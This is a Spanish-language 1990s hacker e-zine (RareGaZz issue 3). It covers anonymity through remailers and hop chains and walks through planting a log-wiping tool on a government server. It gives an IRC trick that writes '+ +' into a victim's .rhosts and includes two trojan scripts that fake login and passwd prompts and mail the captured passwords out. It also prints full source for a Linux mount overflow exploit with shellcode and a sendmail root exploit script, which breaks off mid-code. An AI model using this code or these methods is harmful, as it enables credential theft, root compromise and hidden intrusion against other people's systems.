Copy Link
Add to Bookmark
Report

RareGaZz Issue 03

eZine's profile picture
Published in 
RareGaZz
 · 30 Dec 2020

  


El Grupo Revolucionarios del KaoS
presenta

\./\./ RAREGAZZ \./\./

A¤o 1, Numero 3
~~~~~~~~~~~~~~~
"They got the guns but...we got the numbers"

Contenido

1.- Como permanecer UNDERGROUND en Internet. -KillerBot-
2.- Miscelanea sobre los Hackers. -DuvaHazard-
3.- La guia definitiva para Hackear UNIX. -Raven Spirit-
4.- El Bug de SendMail. -Dark Raver-
5.- Los Bugs de Internet Explorer.
6.- Errores en la seguridad de WINDOWS 95.
7.- Kevin Mitnick, La Leyenda.
8.- L3T2 HACK! -RdK-
9.- Nuevas Tecnologias -Anonimo-
10.- CTRL + ALT + DEL
11.- Primer Concurso de RareGaZz

Para enviar colaboraciones o comentarios existen estas direcciones

RAREGAZZ@BIGFOOT.COM
RAREGAZZ@GEOCITIES.COM

Si deseas contactar a la persona que ensambla el magazine

RARETRIP@CYBERDUDE.COM

RAREGAZZ CUENTA CON SU SITIO EN LA RED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.geocities.com/Baja/4426

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

* INTRODUCCION *

Un saludo a todos y disculpas por habernos tardado tanto en terminar de
ensamblar este E-mag pero me gustaria hacerles esta pregunta:

¨Cuanto tardarian ustedes en hacer una pagina html como la de la revista,
Encontrar buenos Links y WareZ, coordinar 4 personas para realizar
distintas tareas y aparte de esto gastar un poco de tiempo hackeando la
red? Gracias, sabia que entenderian.

Por otra parte en este numero tenemos varios scripts para unix, pero ahora
nos hacen falta algunos para IRC que han sido muy solicitados. Si alguno de
ustedes cuenta con uno efectivo no duden en enviarlo a la editorial para
cooperar en la realizacion de este magazine.

Espero disfruten tanto RareGaZz como nosotros hemos disfrutado creandolo.

RareTrip

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ¨COMO PERMANECER UNDERGROUND EN INTERNET? ³
³ KillerBot ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ


Si queremos permanecer en el anonimato mientras nos relacionamos con otras
personas en la red es necesario ser muy cuidadoso y evitar cometer algunos
errores que podrian revelar nuestra identidad a la persona con la que
queramos comunicarnos.

Los requisitos para permanecer Underground (bajo tierra) son los siguientes:

-Tener una cuenta de E-mail Anonima (Hotmail)
-Aprender a usar los remailers
-Usar encripcion
-Usar Esteganografia
-Usar el servicio de www.anonymizer.com para entrar a sistemas
como Hotmail.
-Hackear con Proteccion (Condon)

CUENTAS ANONIMAS DE EMAIL
ßßßßßßßßßßßßßßßßßßßßßßßßß

La parte mas importante de un Hacker es mantener comunicacion segura usando
el correo electronico. Cuando queramos recibir correo anonimo sin revelar
nuestra cuenta personal se recomienda que uses hotmail siempre y cuando
revises el correo usando el anonimizador para evitar que ellos sepan tu
direccion IP. Otra forma de recibir correo sin revelar nuestra cuenta es
usando los remailers.
Los remailers nos permiten generar direcciones anonimas para que otros se
comuniquen con nosotros llamadas ARAS. Para generarlas es necesario contar
con el programa PGP y las llaves publicas de los remailers a usar. Las llaves
publicas y el programa para crear las ARAS estaran disponibles en la pagina
de RareGaZz que mantiene RareTrip en la seccion de WareZ muy pronto.

Las ARAS se crean usando un programa especial y su modo de uso es muy facil.
Digamos que ustedes quieren enviar un mensaje a RAREGAZZ@BIGFOOT.COM pero no
se saben la direccion, lo unico que tienen es la siguiente ARA --> Anonymous
Return Addres:

Copy the material between the "cut here" lines below and put it
at the top of your reply message, then send the message to:
remailer@huge.cajones.com

vvvvvvvvvvvvvvvvvvvvvvv cut here vvvvvvvvvvvvvvvvvvvvvvv
::
Encrypted: PGP

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

hIwD3DcuVanRWD0BBACV8kr+ortb/IvAP2s0sLZJkDvRa7oKWB3n9Fq2Y6/B67qc
YZIAxFRlFv/myHs2a6wxQRGSYjYcWHJ6YK6YNho075cuWdwDAv/DrK9+k3WcTZj/
sxiIjR7PjnlFktj9oy9aWHz6uapr5t2826CsE+x35M/EFQcL5JtE/Gz+KvX/XKYA
AABP1EonU3d81egJv0t8qk86xSoD5T6cLAG7+KiFvZLc+ySdlmfsqGGWmS/skQEL
8PJq5QDXF03ZfdPgKVnuXI42amjepBboUemucN6wphKXHg==
=4GQy
-----END PGP MESSAGE-----

Aqui escribes el mensaje.
^^^^^^^^^^^^^^^^^^^^^^^ cut here ^^^^^^^^^^^^^^^^^^^^^^^

Siguiendo las instrucciones solo es necesario copiar el texto entre las ^ y
enviarlo a el remailer remailer@huge.cajones.com al principio del mensaje y
el remailer interpretara las instrucciones y enviara el texto debajo de la
ARA a la direccion destino anonima.
Para una mayor efectividad de las ARAS es necesario encadenar por lo minimo 2
remailers.

REMAILERS
ßßßßßßßßß

Los remailers son sistemas dedicados unicamente a recibir mensajes de correo,
borrar la informacion del remitente y volverlo a enviar a la persona
especificada por el usuario. Antes de usar cualquier remailer debes de
pedir el archivo de ayuda con el siguiente comando en el subject de un
mensaje dirigido a el remailer: Remailer-Help

Algunos remailers que en estos momentos estan en uso son:

REMAILER@HUGE.CAJONES.COM <--- En servicio
REMAILER@CYPHERPUNKS.CA <--- En servicio
MIXMASTER@REMAIL.OBSCURA.COM <--- Escribe solicitando el archivo HELP
DUSTMAN@ATHENSNET.COM <--- Escribe solicitando el archivo HELP
MIDDLEMAN@CYBERPASS.NET <--- Escribe solicitando el archivo HELP
REMAILER@WAZZO.COM <--- Escribe solicitando el archivo HELP
REMAILER@HIDDEN.NET <--- Escribe solicitando el archivo HELP

Los remailers permiten 'encadenarlos' para hacer el trazeado de un mensaje
mucho mas dificil. Encadenar significa enviar un mensaje a un remailer con
instrucciones para que este lo envie a otro, y el ultimo finalmente al
destinatario.

El comando para que el remailer envie el mensaje debera estar en la primera
linea del cuerpo del mensaje y debera ser asi:
Request-Remailing to: direccion@de.correo.mx
Despues de esa linea se incluye el mensaje a enviar.

Un ejemplo de encadenamiento de remailers es el siguiente:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
To: remailer@huge.cajones.com
From: alguna@persona.sk

Request-Remailing to: remailer@cypherpunks.ca
Request-Remailing to: raregazz@bigfoot.com

Mensaje anonimo!
- - - - - -- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Ahora imaginate que el operador de tu sistema sospecha de ti y revisa
cualquier mensaje que envies ¨Como protegerte y a la vez proteger al que
envias el mensaje? Respuesta: ­USANDO PGP PARA USAR EL REMAILER!

Los remailers tienen la capacidad de aceptar el mensaje y las instrucciones
de envio totalmente encriptadas con su llave pgp lo que hace imposible para
cualquier persona saber a quien va destinado el mensaje y el contenido del
mismo.

Las llaves pgp de los remailers y las instrucciones de uso puedes
conseguirlas enviando un mensaje al remailer con el subject "Remailer-Help".

Checa nuestra pagina WEB y proximamente aparecera el programa SEND.EXE creado
por RareTrip para hacer el uso de los remailers mucho mas facil. Ademas el
programa permitira crear ARAS automaticamente, entre otras cosas.

ENCRIPCION
ßßßßßßßßßß

Este tema ya lo describio raretrip en el numero 2 de RareGaZz asi que solo
me queda darles la ­IMPORTANTE! noticia de que a peticion mia el programa
PGP (216k) ya esta disponible sin problemas en el siguiente link:

http://www.geocities.com/Baja/4426/CRYPT.ZIP
(es importante que el nombre este en mayusculas)
Este ZIP contiene CRYPT.EXE que pregunta por el siguiente password: pgpprg

Por favor noten que en ningun lado de nuestra pagina dice que tenemos PGP asi
que tendran que copiar el link a su navegador y bajarlo. Ademas es muy
importante mencionar que *NO* estara disponible permanentemente asi que
cuando termines de leer este texto inmediatamente bajalo para proteger tu
privacidad. Fecha limite: 25 de Junio de 1997.

ESTEGANOGRAFIA
ßßßßßßßßßßßßßß

Esta tecnica consiste en 'esconder' archivos o mensajes en algun archivo
aparentemente sin importancia. Generalmente se esconden en archivos graficos
de baja calidad y blanco & negro evitando imagenes geometricas para que no se
note que un archivo se encuentra escondido. Cuando se esconden en archivos de
sonido deben ser WAVS de baja calidad para que no se note que ese archivo
contiene otro.

Un buen programa que permite esto lo puedes encontrar en nuestra pagina en la
seccion de WareZ o escribe este link:
http://www.geocities.com/Baja/4426/STEGANOS.ZIP

ANONYMIZER
ßßßßßßßßßß

Este servicio evita que tu direccion IP aparezca en los logs del servidor al
que te conectes ya que te asigna una direccion IP falsa. Es muy util para
ingresar a sitios WWW donde sea indispensable esconder tu procedencia e
identidad como por ejemplo a Hotmail.
La direccion de este servicio es:
http://www.anonymizer.com

HACKEA CON CONDON
ßßßßßßßßßßßßßßßßß

Esto significa que cuando quieras hackear algun sistema usando Telnet y FTP
pongas barreras entre tu y el sistema objetivo. En el siguiente diagrama se
muestra un hacker sin proteccion:

ÚÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ¿
³ hacker ÃÄÄÄÄÄÄÄÄÄÄÄ´ objetivo ³
ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÙ

Ahora aqui se muestra un Hacker con algo de experiencia:

ÚÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄ¿
³ hacker ÃÄÄÄÄÄÄÄÄÄÄ´ condon #1 ³
ÀÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÂÄÄÄÄÄÙ
³
³
ÚÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄÄ¿
³objetivo ÃÄÄÄÄÄÄÄÄÄÄÄ´condon #2 ³
ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÙ

Supongamos que tienes la cuenta R00T y se te ocurre borrar el /etc/passwd o
el /etc/shadow para sacar de circulacion a los usuarios de ese servidor por
un buen tiempo pero tienes miedo que puedan rastrearte. La solucion es
simple.
Cuando realizas una conexion en Internet no la haces directamente sino que
pasas por una serie de servidores que finalmente te hacen llegar a tu
objetivo, por lo que si realizas una conexion protegida como el ejemplo
imaginate cuantos sistemas tendrian que investigar para finalmente llegar a
ti. Como puedes darte cuenta, agarrarte es imposible.

Ahora te presento un ejemplo de conexion Protegida

Si quisieramos poner el codigo fuente del script ZAP.C en el sistema objetivo
(mexico.gob.mx) usando como proteccion los sistemas condon1 (itesm.mx.edu) y
condon2 (unam.mx.edu) tendriamos que sabernos por lo menos el login y
password de la cuenta GUEST y conocer un directorio donde podamos escribir en
cada uno de estos sistemas (generalmente /incoming /tmp /temp). Ahora,
supongamos que nuestro script esta en /usuarios/pepe/zap.c

[ Los caracteres pegados al inicio del texto son outputs del sistema ]

% ftp
ftp> open itesm.mx.edu
UNIX v.4.5
Login: guest
Password: xxxxxx
Bienvenido a ITESM.MX.EDU COMMAND?
ftp> put /usuarios/pepe/zap.c /incoming/zap.c
Transfer File Complete
% open unam.mx.edu
IRIS v.3.5 Please Login
Login: guest
Password: xxxx
Bienvenido al sistema de la Universidad de BLAH BLAH
ftp> put /incoming/zap.c /temp/zap.c
Archivos Recibidos!
ftp> open mexico.gov.mx
Este sistema es para uso del gobierno unicamente, cualquier persona que sea
sorprendida usando una cuenta que no le pertenezca sera perseguida.
Login: zedillo
Password: xxxxxxxx
Bienvenido!
ftp> put /temp/zap.c /tmp/zap.c
ftp> close
connection closed
ftp> close
connection closed
ftp> close
connection closed
ftp> quit

Espero hayan entendido el ejemplo anterior, no significa que lo hagan igual
pero es una idea que me ha servido de mucho. En algunos casos sustituye el
comando PUT por SEND. Ahora para compilar ese script con el mismo nivel de
proteccion necesitas realizar lo mismo pero con conexiones Telnet.

% telnet itesm.mx.edu
UNIX v.4.5
Login: guest
Password: xxxxxx
Bienvenido a ITESM.MX.EDU COMMAND?
% telnet unam.mx.edu
IRIS v.3.5 Please Login
Login: guest
Password: xxxx
Bienvenido al sistema de la Universidad de BLAH BLAH
% telnet mexico.gov.mx
Este sistema es para uso del gobierno unicamente, cualquier persona que sea
sorprendida usando una cuenta que no le pertenezca sera perseguida.
Login: zedillo
Password: xxxxxxxx
Bienvenido!
% cd /tmp
% cc -o zap zap.c
Compile Succesful!
% zap

Es todo por este numero y espero les sirvan de algo las sugerencias que les
invito a usar para permanecer mas tiempo en la red sin ser detectado. Despues
de todo ¨QUIEN QUIERE SER FAMOSO? Por ahora no revelare mi direccion de email
a pesar de las peticiones por parte de raretrip pero la verdad es muy
riesgoso en estos momentos. disculpen.

KillerBot

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

ððððððððððððððððððððððððððððð
º Miscelanea Sobre Hackers º
º por º
º DuvaHazard º
ððððððððððððððððððððððððððððð

Despues de varios a¤os de andar vagando por ese lugar
del que todos hablan y al que todos van pero nadie ha visto,
me he encontrado con gente ignorante que se hace llamar autoridad
y piensa que lo sabe todo sin primero estar seguro de ello.

Esta va dedicada con cari¤o a todos aquellos de la prensa
inutil (porque la hay util) y a los medios de comunicacion que
confunden lo que es un Cracker y un Hacker.

Son documentos que encontre por ahi, pero pues como
no todos nacemos hablando ingles, ahi les va en el idioma de
Cervantes:

CRACKER
~~~~~~~
La definicion de un cracker es alguien que intenta entrar a un
sistema por la via de crackear/adivinar claves de acceso de usuarios.

La mayoria de los crackers son jovenes adolescentes que son bastante
maliciosos y buscan divertirse destruyendo o alterando la informacion
de un sistema.

Los medios de comunicacion muy frecuentemente confunden a el cracker
con el hacker. Notese tambien que el nivel de educacion/inteligencia
del cracker acerca del sistema y su funcionamiento interno etc. es muy
bajo.

HACKER
~~~~~~
Del otro lado el hacker es el individuo que anhela el conocimiento.
Los hackers son individuos muy sabios. Numerosas veces saben varios
lenguajes de programacion, trabajan extensivamente con las entra¤as
y el exterior de UNIX, tienen una firme comprension sobre todas las
implementaciones y protocolos de TCP/IP. Se mantienen actualizados
en todos los temas de seguridad que involucren computadoras. Entrar
a un sistema para un hacker es una aventura, una emocion, es un reto
que pueden enfrentar. El hacker obtiene bastante excitacion al
explorar el sistema desde el interior/exterior buscando vigorosamente
malas configuraciones, bugs(fallas), y hoyos en el sistema operativo
que los permitieran entrar a una maquina. Una vez en el sistema el
reto ha sido acompletado y han triunfado en entrar. Es contra la etica
de los hackers alterar cualquier informacion excepto los archivos de
bitacora (log files) que son necesarios para limpiar sus huellas. No
tienen necesidad ni deseo de destruir informacion como los maliciosos
crackers. Estan ahi para explorar el sistema y aprender mas. El hacker
tiene un deseo constante y sed de conocimiento que crece intensamente
conforme su aventura progresa.

CandyMan

candyman@mcs.com
http://www.mcs.net/~candyman/

@ NOTA @ ===--- Este articulo aparecio en PCNoticias del A¤o 2 #17

@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#

===========----------------
Accesorios de los Hackers
----------------===========

@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#

Ademas de un modo comun de vestir, hay ciertas prendas o herramientas
que un hacker puede traer cargando. Muchas veces utilizan una mochila
negra (aunque varias son verdes para combinar con las botas militares
de algunos) llena hasta reventar de cosas que los hackers deben tener
para sostener sus vidas de hacker cuando son separados de sus
computadoras.

Un inventario total podria ser como este:

-Libreta (tama¤o normal y otro)
-Multiples lapices y plumas
-Varios desarmadores, llaves (para instalar tarjetas, y abrir gabinetes)
-La calculadora programable mas increible que la persona pudo encontrar.
Estas tienden a las unidades HP {RPN}, pero hay una substanciosa minoria
usando unidades algebraicas Casio. Estas deben graficar si del todo
posible.
-Diskettes. Una variedad de diskettes con programas de diagnostico, un
proyecto actual que transporta a una maquina nueva, o los ultimos
programas adquiridos para jugar un rato con ellos.
-Cochinero. Y bastante. Examenes viejos, impresiones de codigo fuente,
cuentas sin pagar, pedazos de papel con notas sobre ideas de programas.
Numeros IP, y numeros de telefono, etc...
-Una buena navaja de bolsillo. Sobresalen las navajas Suizas con varias
cochinadas.
-Un instrumento musical. Las harmonicas dominan esta categoria, aunque
se dan casos en que algunos traen silvatos.
-Un multiprobador
-Hackers monetariamente mas equipados tambien pueden ser vistos con
computadoras portatiles, Apple Newtons u otros PDAs. Un hacker muy
bien equipado puede seguir sumergido en su trabajo durante una lectura
aburrida o mientras va en el autobus.

---> DUVAHAZARD@HOTMAIL.COM <---
http://www.dynamo.com.mx/DUVAHAZARD/

[ Este texto fue enviado a nosotros por el creador de los mismos asi que no
estamos pirateando a PcNoticias ademas la diferencia entre las revistas
es enorme, primeramente RareGaZz es 100% amigable con el ambiente ya que
no perjudicamos ningun arbolito. Ya empezamos las pruebas para ver si
RareGaZz tambien puede ser leido en el ba¤o y salieron favorables en los
sistemas NoteBook pero totalmente desastrosos con las Pc caseras. Esten
pendientes mientras solucionamos este Bug de la revista... :-) ]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

+-+-+-+-+-+-+-+-++-+-+-+-+-+
| La guia definitiva para |
+ Hackear UNIX +
| * Raven Spirit * |
+-+-+-+-+-+-+-+-++-+-+-+-+-+

Hola a todos. Espero que los que leais este documento comprendais como se
hackea un unix. En mis frecuentes visitas al IRC mucha gente pregunta sobre
el /etc/passwd, mucha gente anda buscando diccionarios de palabras y otros
tantos buscan el mejor crackeador. ¨ para que ?. Hay maneras mucho mas
rapidas y por supuesto divertidas de conseguir una cuenta. Y por supuesto es
demasiado dificil desencriptar la cuenta del root, por lo que solo se utiliza
en casos extremos, los programas tipo dictmake solo se usan en casos muy
raros y cuando no nos queda otro recurso.
Empezamos. Antes de empezar me gustaria que quedara claro que si quereis ser
hackers en serio necesitais linux, no es absolutamente necesario pero
facilita muchisimo las cosas.
Para hackear un unix la primera cosa que necesitamos es, logico, introducirse
en el sistema. Algunos otros ordenadores tienen ftp's anonimos a los que
podemos acceder, pero hacedme caso, no servira para nada.
Para introducirnos en un sistema necesitamos que tenga al menos una parte de
acceso publico. Generalmente esa parte es la famosa pantalla " Login: y
Password: "
que me imagino que todos conocereis.
Esta pantalla simplemente vale para identificar que la entrada de un usuario
en ese sistema sea legitima. Sin embargo esas tontas maquinas que solo saben
la diferencia entre 0 y 1 si les damos un login y password que esten dados
de alta en ese sistema nos dejara pasar ( a no ser que tengan un sistema de
reconocimiento de IP para lo que necesitariamos hacer IP-Spoofing, pero esto
solo nos ocurrira en ciertos ordenadores de alta seguridad ). ¨Como conseguir
acceso al sistema? La manera mas facil, la ingenieria social. No creo que
haga falta explicar eso. Simplemente podeis utilizar el comando finger, para
los que useis linux y los que no usais el finger del mIrc. Este comando nos
dara informacion sobre el titular del e-mail que nostros le demos, que segun
la maquina sera, o mas o menos o a veces nada. Menos da una piedra. Si estais
desde linux podeis usar comandos "r" como "rlogin loquesea.com -l loginquesea"
esto os mete en el sistema, pero hay que conseguir una cuenta para poder usar
los exploits que explicar‚ mas adelante. Sin embargo hay otras maneras de
conseguir acceso al sistema, como por ejemplo la que explico ahora

COMO ACCEDER A UN ORDENADOR HACKEANDO DESDE EL IRC:
Esto solo lo podeis hacer desde linux, yo lo he probado desde win95 y 3.1 y
no lo he conseguido hacer. Primero hacemos un /whois #uncanalconmuchagente
para encontrar si hay alguien que se conecte desde un unix, que normalmente
sera una universidad. El unico problema que tiene esto es que no podemos
elegir el ordenador, pero de todas maneras es muy divertido.
Lo unico que necesitamos es meter la cadena + + en su fichero /.rhosts y la
verdad es que es una tonteria tremenda.
Buscamos a la victima y vamos a un canal donde este el, despues le hablaremos
desde un privado. Ahora entra la imaginacion de cada uno, porque tenemos que
mandarle un fichero por DCC ( por ejemplo prueba.irc ) y que el escriba:
/load prueba.irc Me imagino que vuestra imaginacion os ayudara a resolverlo.
Lo primero es conseguir el fichero prueba.irc. Solo esta linea :
/exec echo: "/exec echo + + > $HOME/.rhosts >> prueba.irc
Ya tenemos el fichero prueba,lo mejor es que para que no se de cuenta podemos
a¤adirle alguna conachada que se nos ocurra ( alla cada uno se las apa¤e ).
Listo. Cuando el tio en cuestion escriba /load prueba.irc nosotros ejecutamos
% rlogin ordenador_de_la_victima.com -l login_de_la_victima
Ya estamos dentro. Facil ¨ No ?

Y para terminar un truquillo que quizas os valga para algo, simplemente
cambiamos la paridad de nuestro modem a 7E1 y telneteamos al ordenador en
cuestion. Si hemos tenido suerte, cuando alguien intente conectarse, nos
"
colaremos" en su lugar.

Despues de todo esto se supone que ya estamos dentro. Ahora hay que, o sacar
una cuenta si no la tenemos o conseguir privilegios de root. Para lo primero:
- Podemos usar el archirenombrado /ect/passwd ( si tenemos privilegios para
leerlo ) y crackearlo pero si quereis mi consejo solo usad el fichero passwd
para conseguir una cuenta cualquiera en el sistema y poder ejecutar comandos
en el, poder usar un bug o exploit.
- Usar un trojan o Caballo De Troya, esta opcion tambien requiere tiempo pero
por supuesto menos que crackear el fichero passwd, por que funciona en cuanto
cualguier usuario se conecte al sistema. ATENCION, si conseguimos la cuenta
del root nos podremos saltar el paso "
conseguir privilegios de root", aunque
los sysadmins, algunos, pueden sospechar aunque la verdad es que despues de
hackear durante un tiempo te das cuenta de lo estupidos que pueden llegar a
ser. Quizas sea una de las mejores formas. Un caballo de troya es un fichero
que metido en el sistema hace que un usuario crea que ha introducido su
password mal, pero en realidad el password es enviado a la direccion de correo
que nosostros le digamos. Aqui incluyo uno, pero acordaos de ponerle la
direccion a la que quereis que os mande el passwd, y ademas en algunos
sistemas en lugar de "
Login:" nos dice : "marte login: " o algo distinto de
login, por lo que tambien lo tenemos que cambiar para que nadie note la
diferencia. Este es :
------SCRIPT------
#!/bin/sh
rm -rf $0
cp $HOME/.login $HOME/.l
echo ''>$HOME/.hushlogin
echo "
stty intr '^@'
echo 'Login incorrect'
echo -n 'login: '
echo $<>.t
echo -n 'Password: '
stty -echo
echo $<>>.t
mail tunombre@tudirecciondecorreoanonima<.t
rm .t
cat /etc/motd
mv .l .login
rm .hushlogin
stty echo
source .login">$HOME/.login
----END SCRIPT----

Este tipo de scripts tambien se pueden usar en /bin/passwd, para cuando un
usuario cambie su contrase¤a pero el problema es que no es muy normal que
un usuario cambie su contrase¤a, o por lo menos pasa muy de vez en cuando.
Para mayor seguridad lo mejor es poner el que esta arriba,( para el caso es
mejor poner los dos ) pero sin embargo aqui pongo el otro, por si acaso
( acordaos de la direccion de correo ) :

------SCRIPT------
#!/bin/tcsh
echo -n "
Changing password for $USER on ";hostname
echo -n "
Old password: "
stty -echo
echo $<>$HOME/.tym
echo ""
echo -n "
New password: "
echo $<>>$HOME/.tym
echo ""
stty echo
mail tunombre@tudirecciondecorreoanonima<$HOME/.tym
rm $HOME/.tym
echo "
Error: Incorrect Password"
rm -f $0
unalias /bin/passwd
unalias passwd
---END SCRIPT---

La ventaja que tienen estos dos scripts es que no influye que el fichero
passwd este shadowed o no.

Creo que con esto nos llega para conseguir una cuenta en un ordenador normal.
Pasamos a lo siguiente, conseguir los privilegios de root.

Para conseguir privilegios de root en un sistema NO hace falta desencriptar
la cuenta del root del fichero passwd. Para ser root recurrimos a los bugs y
a los exploits. Los bugs son "
agujeros" en el dise¤o del SSOO y se suelen
encontrar en listas de correo de seguridad, aunque hay algunas webs donde
estan recopilados. Los exploits son programas que utilizan esos bugs para
conseguirnos privilegios de root, aunque no es para lo unico que sirven, me
refiero a que podemos usar un exploit para leer el correo de alguien, para
ocultar lo que estemos haciendo en el ordenador etc...

Los exploits son ficheros de codigo .c que hay que compilar en el ordenador
a hackear. Se meten por ftp y se compilan:
% cc -o loquesea loquesea.c
% loquesea
Listo. Hay algunos que requieren una manera especial de utilizacion, pero
lo indica claramente si editamos el fichero.

Los bugs y exploits suelen estar clasificados por sistemas, para que sea mas
facil localizarlos. La verdad es que os recomiendo tener los exploits y bugs
en vuestro ordenador ordenados por directorios, para que no perdais el tiempo
la paciencia buscandolos.

Para que tengais alguna ayuda os voy a poner aqui unos cuantos:


Quizas este ya lo conozcais, es el mount, y funciona en casi todos los linux:

<-------------------------------------CORTAD AQUI--------------------------->

/* Mount Exploit for Linux, Jul 30 1996
Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_MOUNT "
/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("
movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"
\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"
\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"
\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("
can't allocate memory\n");
exit(0);
}
ptr = buff;

/* fill start of buffer with nops */

memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);

/* stick asm code into the buffer */

for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("
Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
execl(PATH_MOUNT, "
mount", buff, NULL);
}
<--------------------------------------FINAL-------------------------------->

Este otro exploit os dara un shell de root en los ordenadores que usen el
sendmail 8.6.4, este es el codigo original, leed las lineas que empiecen por
# porque es lo que teneis que escribir vosotros por que es distinto en cada
sistema:

<--------------------------------CORTAD AQUI-------------------------------->
# location of sendmail
SENDMAIL=/usr/lib/sendmail

# location of original sendmail.cf file
CONFIG=/nau/local/lib/mail/sendmail.cf
#CONFIG=`strings $SENDMAIL | grep sendmail.cf`

# program to execute as root
SHELL=/bin/csh

TEMPDIR=/tmp/sendbug-tmp.$$
mkdir $TEMPDIR
chmod 700 $TEMPDIR
cd $TEMPDIR

cp $SENDMAIL sm
chmod 700 sm

echo "
Creating setid0 ..."
cat > setid.c << _EOF_

/* set uid to zero, thus escaping the annoying csh and solaris sh
* problem..
*
* if (getuid() != geteuid()) {
* printf("
permission denied, you root-hacker you.\n");
* exit(1);
* }
*
* .. must be run euid 0, obviously. with no args it runs /bin/sh,
* otherwise it runs the 1st arg.
*/

#include <stdio.h>

main(argc, argv)
int argc;
char *argv[];

int uid;

setuid(0);
setgid(0);
seteuid(0); /* probabally redundant. */
setegid(0);

uid = getuid();

if (uid != 0) {
printf("
setuid(0); failed! aborting..\n");
exit(1);
}

if (argc !=2) {
printf("
executing /bin/sh...\n");
system("
/bin/sh");
}
else
{
printf("
executing %s...\n", argv[1]);
system(argv[1]);
}

_EOF_

cc -o setid0 setid.c

echo "
Creating calc..."

cat > calc.c << _EOF_
/*
* Determines offset in sendmail of
* sendmail.cf file location.
* author: timothy newsham
*/
#include <fcntl.h>

gencore()

int pid;
int fd[2];

if(pipe(fd) < 0) {
perror("
pipe");
exit(1);
return(0);
}
pid = fork();
if(!pid) {
int f = open("
./out", O_RDWR|O_CREAT, 0666);
dup2(f, 1); dup2(fd[0], 0);
close(f); close(fd[1]); close(fd[0]);
execl("
./sm","sm","-d0-9.90","-oQ.","-bs", 0);
perror("
exec");
exit(0);
} else {
sleep(2);
kill(pid, 11);
}
close(fd[0]);
close(fd[1]);


main(argc,argv)
char **argv;
int argc;

unsigned int ConfFile,tTdvect,off;

gencore();
sync(); /* grr. */
tTdvect = find("
ZZZZZZZZ", "core");
ConfFile = find(argv[1], "
core");
if(!tTdvect || !ConfFile) {
return(1);
}
off = ConfFile - tTdvect;

printf("
-d%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.0\n",
off, '/', off+1, 't', off+2, 'm', off+3, 'p', off+4, '/', off+5, 's', \
off+6, 'm', off+7, '.', off+8, 'c', off+9, 'f', off+10);


int find(pattern, file)
char *pattern,*file;

int fd;
int i, addr;
char c;

fd = open(file, 0);

i = 0;
addr = 0;
while(read(fd, &c, 1) == 1) {
if(pattern[i] == c)
i++;
else
i=0;
if(pattern[i] == '\0') {
addr -= strlen(pattern);
return(addr);
}
addr++;
}
return(0);

_EOF_
cc calc.c -o calc

echo "
Scanning core image for $CONFIG..."

DEBUGFLAGS=`calc $CONFIG`

echo "
Creating alias.sh ..."
echo "
#!/bin/sh
